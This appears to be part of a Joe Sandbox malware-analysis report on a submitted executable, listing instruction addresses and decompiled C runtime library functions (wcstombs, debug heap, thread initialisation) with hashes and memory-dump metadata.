0x00000000
0x00421d67
0x00421d67
0x00421d6d
0x00421d6d
0x00421d74
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00421db7
0x00421db7
0x00421dc1
0x00421deb
0x00421dee
0x00421df1
0x00421df8
0x00421df8
0x00421dfc
0x00421dc3
0x00421dc3
0x00421dcf
0x00421dd6
0x00421dd8
0x00421ddb
0x00421dde
0x00421de4
0x00421de6
0x00421de6
0x00421de9
0x00000000
0x00000000
0x00421e04
0x00421e04
0x00000000
0x00000000
0x00421e10
0x00421e10
0x00421e1a
0x00421e3d
0x00421e47
0x00421e47
0x00421e4b
0x00421e1c
0x00421e1c
0x00421e28
0x00421e2f
0x00421e31
0x00421e31
0x00421e38
0x00000000
0x00000000
0x00421e53
0x00421e53
0x00421e5a
0x00421e66
0x00421e69
0x00421e76
0x00421f89
0x00000000
0x00421f89
0x00421e7c
0x00421e7c
0x00421e82
0x00421e82
0x00421e89
0x00000000
0x00421ebf
0x00421ebf
0x00421ec2
0x00421ec8
0x00421ef0
0x00421ef0
0x00421ef3
0x00421ef9
0x00421f1e
0x00421f1e
0x00421f21
0x00421f27
0x00421f60
0x00421f71
0x00000000
0x00421f71
0x00421f29
0x00421f29
0x00421f2c
0x00421f32
0x00000000
0x00000000
0x00421f34
0x00421f34
0x00421f37
0x00421f3d
0x00000000
0x00000000
0x00421f3f
0x00421f3f
0x00421f42
0x00421f48
0x00000000
0x00000000
0x00421f4a
0x00421f4a
0x00421f4d
0x00421f53
0x00000000
0x00000000
0x00421f55
0x00421f55
0x00421f58
0x00421f5e
0x00421f62
0x00421f62
0x00000000
0x00421f62
0x00000000
0x00421f5e
0x00421efb
0x00421efb
0x00421efe
0x00421f05
0x00000000
0x00000000
0x00421f07
0x00421f0a
0x00421f0d
0x00421f10
0x00421f13
0x00421f19
0x00000000
0x00421f19
0x00421eca
0x00421eca
0x00421ecd
0x00421ed4
0x00000000
0x00000000
0x00421ed6
0x00421ed9
0x00421edc
0x00421edf
0x00421ee2
0x00421ee8
0x00000000
0x00000000
0x00421f73
0x00421f76
0x00421f79
0x00000000
0x00000000
0x00421e90
0x00421e90
0x00421e93
0x00421e99
0x00421eb1
0x00421eb4
0x00421eb7
0x00421e9b
0x00421e9e
0x00421ea1
0x00421ea7
0x00421eac
0x00421eac
0x00000000
0x00000000
0x00421f7e
0x00421f81
0x00421f86
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00421d91
0x00421d94
0x00421d97
0x00000000
0x00000000
0x00421d9c
0x00421d9f
0x00421da4
0x00000000
0x00000000
0x00421d86
0x00421d86
0x00421d89
0x00421d8c
0x00000000
0x00000000
0x00421d7b
0x00421d7e
0x00421d81
0x00000000
0x00000000
0x00421da9
0x00421da9
0x00421dac
0x00421daf
0x00000000
0x00000000
0x00421db2
0x00000000
0x00000000
0x00421b4e
0x00421b50
0x00421b5e
0x00421b52
0x00421b52
0x00421b52
0x00421b68
0x00421b6e
0x00421b7b
0x00421b7d
0x00421b82
0x00421b84
0x00421b89
0x00421b8e
0x00421b90
0x00421b95
0x00421b9b
0x00421b9d
0x00421b9d
0x00421b9b
0x00421b9e
0x00421ba5
0x00000000
0x00421ba7
0x00421bac
0x00421bc8
0x00421bd0
0x00421bdd
0x00421be2
0x00422aa1
0x00422aae
0x00422aae
0x00421ba5
0x00421b48
0x004229dd
0x004229e4
0x004229fb
0x004229ef
0x004229ef
0x004229ef
0x00422a05
0x00422a0b
0x00422a18
0x00422a1a
0x00422a1f
0x00422a21
0x00422a26
0x00422a2b
0x00422a2d
0x00422a32
0x00422a38
0x00422a3a
0x00422a3a
0x00422a38
0x00422a42
0x00422a8d
0x00422a96
0x00422a9b
0x00422a44
0x00422a49
0x00422a65
0x00422a6d
0x00422a7a
0x00422a7f
0x00422a7f
0x00000000
0x00422a42
0x004227dc
0x004227e2
0x004227ec
0x00422801
0x00422816
0x00422818
0x0042281c
0x0042281c
0x00422803
0x00422803
0x00422807
0x00422807
0x004227ee
0x004227ee
0x004227f2
0x004227f2
0x004227ec
0x0042282c
0x00422838
0x0042284e
0x00422853
0x00422853
0x00422869
0x0042286e
0x00422877
0x00422895
0x0042289a
0x0042289a
0x004228a1
0x00422975
0x00422988
0x0042298d
0x00000000
0x004228b1
0x004228b1
0x004228b1
0x004228be
0x004228c7
0x004228cd
0x004228cd
0x004228dc
0x004228e4
0x00000000
0x00000000
0x004228ea
0x004228f3
0x00422912
0x00422917
0x0042291a
0x00422929
0x00422936
0x00422941
0x00422941
0x00000000
0x0042294d
0x0042294d
0x00422966
0x0042296b
0x00000000
0x0042296b
0x00422936
0x00422973
0x00422990
0x00422997
0x004229b5
0x004229ba
0x004229ba
0x00000000
0x00422997
0x00421f8e
0x00421f8e
0x00421f95
0x00421f9b
0x00421fa1
0x00421fa4
0x00421faa
0x00421fbd
0x00421fbd
0x00421fc4
0x00000000
0x0042231e
0x0042231e
0x00422325
0x0042232c
0x0042232f
0x00000000
0x00000000
0x00421fcb
0x00421fce
0x00421fd4
0x00421fd9
0x00421fde
0x00421fde
0x00000000
0x00000000
0x0042210b
0x0042210e
0x00422113
0x00422118
0x0042211e
0x0042211e
0x00000000
0x00000000
0x004224eb
0x004224eb
0x00000000
0x00000000
0x00422075
0x00422075
0x00422081
0x0042208e
0x0042209c
0x0042209c
0x004220a2
0x004220a5
0x004220b1
0x00422106
0x00000000
0x00422106
0x00422090
0x00422090
0x0042209a
0x004220b6
0x004220b9
0x004220bf
0x004220e7
0x004220ee
0x004220f4
0x004220f7
0x004220fa
0x00422100
0x00422103
0x004220c1
0x004220c1
0x004220c7
0x004220ca
0x004220cd
0x004220d3
0x004220d6
0x004220d9
0x004220db
0x004220de
0x004220de
0x00000000
0x004220bf
0x00000000
0x00000000
0x00422335
0x00422338
0x0042233b
0x0042233e
0x00422344
0x00422347
0x00422352
0x0042235d
0x00422361
0x00422378
0x0042237f
0x00422381
0x00422381
0x00422388
0x0042238f
0x004223a0
0x004223af
0x004223b6
0x004223cc
0x004223b8
0x004223b8
0x004223bb
0x004223c1
0x004223c7
0x004223c7
0x004223b6
0x004223d6
0x004223d9
0x004223dc
0x004223df
0x004223e2
0x004223e5
0x004223eb
0x004223f1
0x004223f9
0x004223fa
0x004223fd
0x004223fe
0x00422401
0x00422402
0x00422409
0x0042240a
0x0042240d
0x0042240e
0x00422411
0x00422412
0x00422418
0x00422419
0x00422427
0x00422429
0x0042242f
0x00422435
0x0042243d
0x00422445
0x00422446
0x00422449
0x0042244a
0x00422458
0x0042245a
0x0042245a
0x0042245d
0x00422467
0x0042246c
0x00422472
0x00422474
0x0042247c
0x0042247d
0x00422480
0x00422481
0x00422490
0x00422492
0x00422492
0x00422472
0x00422495
0x00422498
0x0042249e
0x004224a3
0x004224a9
0x004224af
0x004224b2
0x004224b2
0x004224b5
0x004224c1
0x00000000
0x004224c1
0x00422363
0x00422363
0x0042236d
0x00000000
0x00000000
0x0042236f
0x0042236f
0x00000000
0x0042236f
0x00422354
0x00422354
0x00000000
0x00000000
0x00421fe1
0x00421fe4
0x00421fea
0x00422045
0x0042204d
0x00422054
0x0042205a
0x00422060
0x00421fec
0x00421fec
0x00421ff6
0x00421ffa
0x00422002
0x00422009
0x00422016
0x0042201d
0x00422029
0x00422036
0x00422038
0x00422038
0x0042203f
0x00422067
0x0042206d
0x00000000
0x00000000
0x004224c9
0x004224cc
0x004224cf
0x004224d2
0x00000000
0x00000000
0x00422227
0x00422227
0x00422233
0x00422240
0x004222ea
0x004222ed
0x004222f0
0x00422304
0x0042230a
0x00422310
0x004222f2
0x004222f2
0x004222ff
0x004222ff
0x00422312
0x00000000
0x00422312
0x00422246
0x00422246
0x00422248
0x00422256
0x0042224a
0x0042224a
0x0042224a
0x00422260
0x00422266
0x00422273
0x00422275
0x0042227a
0x0042227c
0x00422281
0x00422286
0x00422288
0x0042228d
0x00422293
0x00422295
0x00422295
0x00422293
0x0042229d
0x004222e5
0x00000000
0x0042229f
0x0042229f
0x004222a4
0x004222c0
0x004222c8
0x004222d2
0x004222d5
0x004222da
0x00000000
0x004222da
0x00000000
0x0042252c
0x0042252c
0x00422536
0x0042253c
0x00422541
0x00422547
0x00422547
0x00000000
0x00000000
0x004224e4
0x004224e4
0x00000000
0x00000000
0x00422121
0x00422125
0x00422133
0x00422136
0x00422127
0x00422127
0x00422127
0x0042213c
0x00422142
0x00422148
0x00422154
0x0042215a
0x00422160
0x004221c7
0x004221cb
0x004221cd
0x004221d3
0x004221d3
0x004221d6
0x004221d9
0x004221df
0x004221df
0x004221df
0x004221eb
0x004221ee
0x004221f6
0x00000000
0x00000000
0x004221f8
0x004221f8
0x004221fe
0x00422203
0x00000000
0x00000000
0x00422205
0x0042220b
0x0042220e
0x0042220e
0x00422216
0x0042221c
0x0042221f
0x00000000
0x00422162
0x00422162
0x00422166
0x00422168
0x0042216d
0x0042216d
0x00422170
0x00422177
0x0042217a
0x00422180
0x00422180
0x00422180
0x0042218c
0x0042218f
0x00422197
0x00000000
0x00000000
0x00422199
0x00422199
0x0042219f
0x004221a4
0x00000000
0x00000000
0x004221a6
0x004221ac
0x004221af
0x004221af
0x004221b7
0x004221bd
0x004221c0
0x004221c2
0x00422222
0x00000000
0x00422222
0x00000000
0x00000000
0x00000000
0x004224f7
0x004224f7
0x00422501
0x00422501
0x0042250b
0x00422511
0x00422513
0x0042251d
0x00422520
0x00422523
0x00422523
0x00000000
0x00000000
0x00000000
0x00000000
0x00421fc4
0x004227d2
0x004227d2
0x004227d2
0x004227d2
0x004227d2
0x004227d2
0x004227d2
0x0042262f
0x00422626
0x0042254a
0x0042254a
0x0042254a

APIs

_get_int64_arg.LIBCMTD ref: 00422558
_get_int64_arg.LIBCMTD ref: 00422580
__aullrem.LIBCMT ref: 00422725
__aulldiv.LIBCMT ref: 00422747

Strings

9, xrefs: 00422758

Memory Dump Source

Source File: 00000000.00000002.371044521.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.371034338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371262042.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371760532.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371769159.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371799237.00000000004E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q5W0I0pzFI.jbxd

Similarity

API ID: _get_int64_arg$__aulldiv__aullrem
String ID: 9
API String ID: 2124759748-2366072709
Opcode ID: c9127f2b7bf49639ab29760d4a296635a0a4abd98f0b5ede68abd4724d6f273b
Instruction ID: 9ced179ba1690a5921330661ee435c8b512cb2b1c15e4596a50d7d39e6238b42
Opcode Fuzzy Hash: c9127f2b7bf49639ab29760d4a296635a0a4abd98f0b5ede68abd4724d6f273b
Instruction Fuzzy Hash: A441E672E06229EFDB24CF58DD89BAEB7B5BB44300F6081DAE009A7240C7785E85CF45

Uniqueness

Uniqueness Score: -1.00%

Function 0040F643 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0040F74D
__free_base.LIBCMTD ref: 0040F759

Strings

f:\dd\vctools\crt_bld\self_x86\crt\src\dbgheap.c, xrefs: 0040F667
pHead->nBlockUse == nBlockUse, xrefs: 0040F65B

Memory Dump Source

Source File: 00000000.00000002.371044521.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.371034338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371262042.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371760532.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371769159.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371799237.00000000004E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q5W0I0pzFI.jbxd

Similarity

API ID: __free_base_memset
String ID: f:\dd\vctools\crt_bld\self_x86\crt\src\dbgheap.c$pHead->nBlockUse == nBlockUse
API String ID: 2669475236-3676899318
Opcode ID: 4a818dfec952e0b2d0afd4252110d043082add3fc151f2b79984df118602ec72
Instruction ID: 074ee9d086fa0d3fc42723e2b185d883f3b6e9c6f2ee41a874e42206291b9321
Opcode Fuzzy Hash: 4a818dfec952e0b2d0afd4252110d043082add3fc151f2b79984df118602ec72
Instruction Fuzzy Hash: 31213075A00104EFC714DF44CA95A6A77B2BB85305F34C1B9D4052B396C77AEE06DF89

Uniqueness

Uniqueness Score: -1.00%

Function 0040F6BE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 40COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0040F74D
__free_base.LIBCMTD ref: 0040F759

Strings

f:\dd\vctools\crt_bld\self_x86\crt\src\dbgheap.c, xrefs: 0040F6CA
_pLastBlock == pHead, xrefs: 0040F6BE

Memory Dump Source

Source File: 00000000.00000002.371044521.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.371034338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371262042.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371760532.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371769159.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371799237.00000000004E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q5W0I0pzFI.jbxd

Similarity

API ID: __free_base_memset
String ID: _pLastBlock == pHead$f:\dd\vctools\crt_bld\self_x86\crt\src\dbgheap.c
API String ID: 2669475236-449961717
Opcode ID: 2439bc1f984c1e2a8dabc8429577f7124c60dc4ad72458934e33c93bd4b77010
Instruction ID: c0ec7e99dc8f0a308a6548c60a1c4a824e98b99860008a4c22c4de9d94a837d2
Opcode Fuzzy Hash: 2439bc1f984c1e2a8dabc8429577f7124c60dc4ad72458934e33c93bd4b77010
Instruction Fuzzy Hash: BF01A7B8A00104EBC714CF54CA85F5AB3B5BB88309F3482BAE5052B3C2D275DE02DB99

Uniqueness

Uniqueness Score: -1.00%

Function 0041D9A6 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E0041D9A6(intOrPtr __ebx, void* __edx, intOrPtr __edi, intOrPtr __esi) {
				intOrPtr* _t155;
				signed int* _t157;
				signed int _t162;
				intOrPtr* _t179;
				intOrPtr _t201;
				void* _t220;
				intOrPtr _t221;
				void* _t222;
				intOrPtr _t240;
				intOrPtr _t247;
				intOrPtr _t290;
				intOrPtr _t291;
				signed int _t292;
				void* _t294;

				_t291 = __esi;
				_t290 = __edi;
				_t221 = __ebx;
				if( *(_t292 + 0x10) != 0) {
					 *(_t292 - 0x30) = 0 |  *(_t292 + 0xc) != 0x00000000;
					if( *(_t292 - 0x30) == 0) {
						_push(L"pwcs != NULL");
						_push(0);
						_push(0x66);
						_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\wcstombs.c");
						_push(2);
						_t220 = L0040C820();
						_t294 = _t294 + 0x14;
						if(_t220 == 1) {
							asm("int3");
						}
					}
					if( *(_t292 - 0x30) != 0) {
						_t274 =  *(_t292 + 0x14);
						L00410290(_t292 - 0x20,  *(_t292 + 0x14));
						if( *(_t292 + 8) == 0) {
							_t155 = E004103A0(_t292 - 0x20);
							_t225 =  *_t155;
							if( *((intOrPtr*)( *_t155 + 0x14)) != 0) {
								_t227 = _t292 - 0x20;
								_t157 = E004103A0(_t292 - 0x20);
								_t274 =  *_t157;
								 *(_t292 - 4) = WideCharToMultiByte( *( *_t157 + 4), 0,  *(_t292 + 0xc), 0xffffffff, 0, 0, 0, _t292 - 0x10);
								if( *(_t292 - 4) == 0 ||  *(_t292 - 0x10) != 0) {
									 *((intOrPtr*)(L00411810(_t227))) = 0x2a;
									 *(_t292 - 0x68) = 0xffffffff;
									E00410370(_t292 - 0x20);
									_t162 =  *(_t292 - 0x68);
								} else {
									 *(_t292 - 0x6c) =  *(_t292 - 4) - 1;
									E00410370(_t292 - 0x20);
									_t162 =  *(_t292 - 0x6c);
								}
							} else {
								_t274 =  *(_t292 + 0xc);
								 *(_t292 - 0x64) = E00413C50(_t225,  *(_t292 + 0xc));
								E00410370(_t292 - 0x20);
								_t162 =  *(_t292 - 0x64);
							}
						} else {
							if( *((intOrPtr*)( *((intOrPtr*)(E004103A0(_t292 - 0x20))) + 0x14)) != 0) {
								if( *((intOrPtr*)( *((intOrPtr*)(E004103A0(_t292 - 0x20))) + 0xac)) != 1) {
									_t240 =  *((intOrPtr*)(E004103A0(_t292 - 0x20)));
									_t274 =  *(_t240 + 4);
									 *(_t292 - 4) = WideCharToMultiByte( *(_t240 + 4), 0,  *(_t292 + 0xc), 0xffffffff,  *(_t292 + 8),  *(_t292 + 0x10), 0, _t292 - 0x10);
									if( *(_t292 - 4) == 0 ||  *(_t292 - 0x10) != 0) {
										if( *(_t292 - 0x10) != 0 || GetLastError() != 0x7a) {
											 *((intOrPtr*)(L00411810(_t240))) = 0x2a;
											 *(_t292 - 0x4c) = 0xffffffff;
											E00410370(_t292 - 0x20);
											_t162 =  *(_t292 - 0x4c);
										} else {
											while( *(_t292 - 4) <  *(_t292 + 0x10)) {
												_t179 = E004103A0(_t292 - 0x20);
												_t247 =  *((intOrPtr*)(E004103A0(_t292 - 0x20)));
												_t274 =  *(_t247 + 4);
												 *((intOrPtr*)(_t292 - 0xc)) = WideCharToMultiByte( *(_t247 + 4), 0,  *(_t292 + 0xc), 1, _t292 - 0x2c,  *( *_t179 + 0xac), 0, _t292 - 0x10);
												if( *((intOrPtr*)(_t292 - 0xc)) == 0 ||  *(_t292 - 0x10) != 0) {
													 *((intOrPtr*)(L00411810(_t247))) = 0x2a;
													 *(_t292 - 0x50) = 0xffffffff;
													E00410370(_t292 - 0x20);
													_t162 =  *(_t292 - 0x50);
												} else {
													if( *((intOrPtr*)(_t292 - 0xc)) < 0 ||  *((intOrPtr*)(_t292 - 0xc)) > 5) {
														 *((intOrPtr*)(L00411810(_t247))) = 0x2a;
														 *(_t292 - 0x54) = 0xffffffff;
														E00410370(_t292 - 0x20);
														_t162 =  *(_t292 - 0x54);
													} else {
														if( *(_t292 - 4) +  *((intOrPtr*)(_t292 - 0xc)) <=  *(_t292 + 0x10)) {
															 *(_t292 - 8) = 0;
															while( *(_t292 - 8) <  *((intOrPtr*)(_t292 - 0xc))) {
																( *(_t292 + 8))[ *(_t292 - 4)] =  *((intOrPtr*)(_t292 +  *(_t292 - 8) - 0x2c));
																_t274 =  &(( *(_t292 + 8))[ *(_t292 - 4)]);
																if(( *(_t292 + 8))[ *(_t292 - 4)] != 0) {
																	 *(_t292 - 8) =  *(_t292 - 8) + 1;
																	 *(_t292 - 4) =  *(_t292 - 4) + 1;
																	continue;
																}
																 *(_t292 - 0x5c) =  *(_t292 - 4);
																E00410370(_t292 - 0x20);
																_t162 =  *(_t292 - 0x5c);
																goto L55;
															}
															_t274 =  &(( *(_t292 + 0xc))[1]);
															 *(_t292 + 0xc) =  &(( *(_t292 + 0xc))[1]);
															continue;
														}
														 *(_t292 - 0x58) =  *(_t292 - 4);
														E00410370(_t292 - 0x20);
														_t162 =  *(_t292 - 0x58);
													}
												}
												goto L55;
											}
											 *(_t292 - 0x60) =  *(_t292 - 4);
											E00410370(_t292 - 0x20);
											_t162 =  *(_t292 - 0x60);
										}
									} else {
										 *(_t292 - 0x48) =  *(_t292 - 4) - 1;
										E00410370(_t292 - 0x20);
										_t162 =  *(_t292 - 0x48);
									}
									goto L55;
								}
								if( *(_t292 + 0x10) > 0) {
									 *(_t292 + 0x10) = E0041DE10( *(_t292 + 0xc),  *(_t292 + 0x10));
								}
								_t274 =  *(_t292 + 0xc);
								_t201 =  *((intOrPtr*)(E004103A0(_t292 - 0x20)));
								_t260 =  *(_t201 + 4);
								 *(_t292 - 4) = WideCharToMultiByte( *(_t201 + 4), 0,  *(_t292 + 0xc),  *(_t292 + 0x10),  *(_t292 + 8),  *(_t292 + 0x10), 0, _t292 - 0x10);
								if( *(_t292 - 4) == 0 ||  *(_t292 - 0x10) != 0) {
									 *((intOrPtr*)(L00411810(_t260))) = 0x2a;
									 *(_t292 - 0x44) = 0xffffffff;
									E00410370(_t292 - 0x20);
									_t162 =  *(_t292 - 0x44);
								} else {
									if( *((char*)( &(( *(_t292 + 8))[ *(_t292 - 4)]) - 1)) == 0) {
										 *(_t292 - 4) =  *(_t292 - 4) - 1;
									}
									_t274 =  *(_t292 - 4);
									 *(_t292 - 0x40) =  *(_t292 - 4);
									E00410370(_t292 - 0x20);
									_t162 =  *(_t292 - 0x40);
								}
								goto L55;
							} else {
								goto L10;
							}
							while(1) {
								L10:
								_t265 =  *(_t292 - 4);
								if( *(_t292 - 4) >=  *(_t292 + 0x10)) {
									break;
								}
								_t274 =  *(_t292 + 0xc);
								if(( *( *(_t292 + 0xc)) & 0x0000ffff) <= 0xff) {
									( *(_t292 + 8))[ *(_t292 - 4)] =  *( *(_t292 + 0xc));
									_t274 =  *( *(_t292 + 0xc)) & 0x0000ffff;
									 *(_t292 + 0xc) =  &(( *(_t292 + 0xc))[1]);
									if(( *( *(_t292 + 0xc)) & 0x0000ffff) != 0) {
										_t274 =  *(_t292 - 4) + 1;
										 *(_t292 - 4) =  *(_t292 - 4) + 1;
										continue;
									}
									 *(_t292 - 0x38) =  *(_t292 - 4);
									E00410370(_t292 - 0x20);
									_t162 =  *(_t292 - 0x38);
									goto L55;
								}
								 *((intOrPtr*)(L00411810(_t265))) = 0x2a;
								 *(_t292 - 0x34) = 0xffffffff;
								E00410370(_t292 - 0x20);
								_t162 =  *(_t292 - 0x34);
								goto L55;
							}
							 *(_t292 - 0x3c) =  *(_t292 - 4);
							E00410370(_t292 - 0x20);
							_t162 =  *(_t292 - 0x3c);
						}
					} else {
						 *((intOrPtr*)(L00411810(_t222))) = 0x16;
						_t162 = E0040C660(_t221, _t222, _t290, _t291, L"pwcs != NULL", L"_wcstombs_l_helper", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\wcstombs.c", 0x66, 0) | 0xffffffff;
					}
					goto L55;
				} else {
					_t162 = 0;
					L55:
					return E00410900(_t162, _t221,  *(_t292 - 0x24) ^ _t292, _t274, _t290, _t291);
				}
			}

0x0041d9a6
0x0041d9a6
0x0041d9a6
0x0041d9aa
0x0041d9bc
0x0041d9c3
0x0041d9c5
0x0041d9ca
0x0041d9cc
0x0041d9ce
0x0041d9d3
0x0041d9d5
0x0041d9da
0x0041d9e0
0x0041d9e2
0x0041d9e2
0x0041d9e0
0x0041d9e7
0x0041da17
0x0041da1e
0x0041da27
0x0041dd5e
0x0041dd63
0x0041dd69
0x0041dd9b
0x0041dd9e
0x0041dda3
0x0041ddaf
0x0041ddb6
0x0041ddc3
0x0041ddc9
0x0041ddd3
0x0041ddd8
0x0041dddd
0x0041dde3
0x0041dde9
0x0041ddee
0x0041ddee
0x0041dd6b
0x0041dd6b
0x0041dd77
0x0041dd7d
0x0041dd82
0x0041dd82
0x0041da2d
0x0041da3b
0x0041dae5
0x0041dbb1
0x0041dbb3
0x0041dbbd
0x0041dbc4
0x0041dbe9
0x0041dbfb
0x0041dc01
0x0041dc0b
0x0041dc10
0x0041dc18
0x0041dc18
0x0041dc2d
0x0041dc4f
0x0041dc51
0x0041dc5b
0x0041dc62
0x0041dc6f
0x0041dc75
0x0041dc7f
0x0041dc84
0x0041dc8c
0x0041dc90
0x0041dc9d
0x0041dca3
0x0041dcad
0x0041dcb2
0x0041dcba
0x0041dcc3
0x0041dcdb
0x0041dcf6
0x0041dd0b
0x0041dd10
0x0041dd18
0x0041dcea
0x0041dcf3
0x00000000
0x0041dcf3
0x0041dd1d
0x0041dd23
0x0041dd28
0x00000000
0x0041dd28
0x0041dd35
0x0041dd38
0x00000000
0x0041dd38
0x0041dcc8
0x0041dcce
0x0041dcd3
0x0041dcd3
0x0041dc90
0x00000000
0x0041dc62
0x0041dd43
0x0041dd49
0x0041dd4e
0x0041dd4e
0x0041dbcc
0x0041dbd2
0x0041dbd8
0x0041dbdd
0x0041dbdd
0x00000000
0x0041dbc4
0x0041daef
0x0041db01
0x0041db01
0x0041db16
0x0041db24
0x0041db26
0x0041db30
0x0041db37
0x0041db71
0x0041db77
0x0041db81
0x0041db86
0x0041db3f
0x0041db4b
0x0041db53
0x0041db53
0x0041db56
0x0041db59
0x0041db5f
0x0041db64
0x0041db64
0x00000000
0x00000000
0x00000000
0x00000000
0x0041da41
0x0041da41
0x0041da41
0x0041da47
0x00000000
0x00000000
0x0041da49
0x0041da54
0x0041da83
0x0041da88
0x0041da91
0x0041da96
0x0041dab1
0x0041dab4
0x00000000
0x0041dab4
0x0041da9b
0x0041daa1
0x0041daa6
0x00000000
0x0041daa6
0x0041da5b
0x0041da61
0x0041da6b
0x0041da70
0x00000000
0x0041da70
0x0041dabc
0x0041dac2
0x0041dac7
0x0041dac7
0x0041d9e9
0x0041d9ee
0x0041da0f
0x0041da0f
0x00000000
0x0041d9ac
0x0041d9ac
0x0041ddfb
0x0041de08
0x0041de08

APIs

__invalid_parameter.LIBCMTD ref: 0041DA07

Strings

f:\dd\vctools\crt_bld\self_x86\crt\src\wcstombs.c, xrefs: 0041D9CE, 0041D9F8
_wcstombs_l_helper, xrefs: 0041D9FD
pwcs != NULL, xrefs: 0041D9C5, 0041DA02

Memory Dump Source

Source File: 00000000.00000002.371044521.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.371034338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371262042.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371760532.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371769159.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371799237.00000000004E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q5W0I0pzFI.jbxd

Similarity

API ID: __invalid_parameter
String ID: _wcstombs_l_helper$f:\dd\vctools\crt_bld\self_x86\crt\src\wcstombs.c$pwcs != NULL
API String ID: 3730194576-2632876063
Opcode ID: 4e54dfd719db28ad63107c14bca027261fa4285f418371f4e0e6beb2fc0eeb5e
Instruction ID: 30b128fd974eedcaae3eb2c19524a179ac837daaebb7a12a08a920dd191e8a05
Opcode Fuzzy Hash: 4e54dfd719db28ad63107c14bca027261fa4285f418371f4e0e6beb2fc0eeb5e
Instruction Fuzzy Hash: 1AF0C2B5F90308AEDB206E60DC07BDF31606B14B15F22063BF417391C2C3BE49A0869D

Uniqueness

Uniqueness Score: -1.00%

Function 0041223C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 18
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041223C() {
				void* _t14;

				E00412070( *((intOrPtr*)(_t14 - 8)),  *((intOrPtr*)(_t14 - 8)), 0);
				 *((intOrPtr*)( *((intOrPtr*)(_t14 - 8)))) = GetCurrentThreadId();
				 *((intOrPtr*)( *((intOrPtr*)(_t14 - 8)) + 4)) = 0xffffffff;
				_t5 = _t14 - 4; // 0x40e623
				SetLastError( *_t5);
				return  *((intOrPtr*)(_t14 - 8));
			}

0x00412242
0x00412253
0x00412258
0x00412276
0x0041227a
0x00412286

APIs

__initptd.LIBCMTD ref: 00412242

Part of subcall function 00412070: __crt_wait_module_handle.LIBCMTD ref: 004120A7
Part of subcall function 00412070: GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 004120D5
Part of subcall function 00412070: GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 004120ED
Part of subcall function 00412070: InterlockedIncrement.KERNEL32(004BB8D0), ref: 0041213C
Part of subcall function 00412070: ___addlocaleref.LIBCMTD ref: 00412190

GetCurrentThreadId.KERNEL32 ref: 0041224A
SetLastError.KERNEL32(#@), ref: 0041227A

Strings

#@, xrefs: 00412276, 00412279

Memory Dump Source

Source File: 00000000.00000002.371044521.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.371034338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371262042.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371760532.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371769159.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371799237.00000000004E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q5W0I0pzFI.jbxd

Similarity

API ID: AddressProc$CurrentErrorIncrementInterlockedLastThread___addlocaleref__crt_wait_module_handle__initptd
String ID: #@
API String ID: 3608204096-669703151
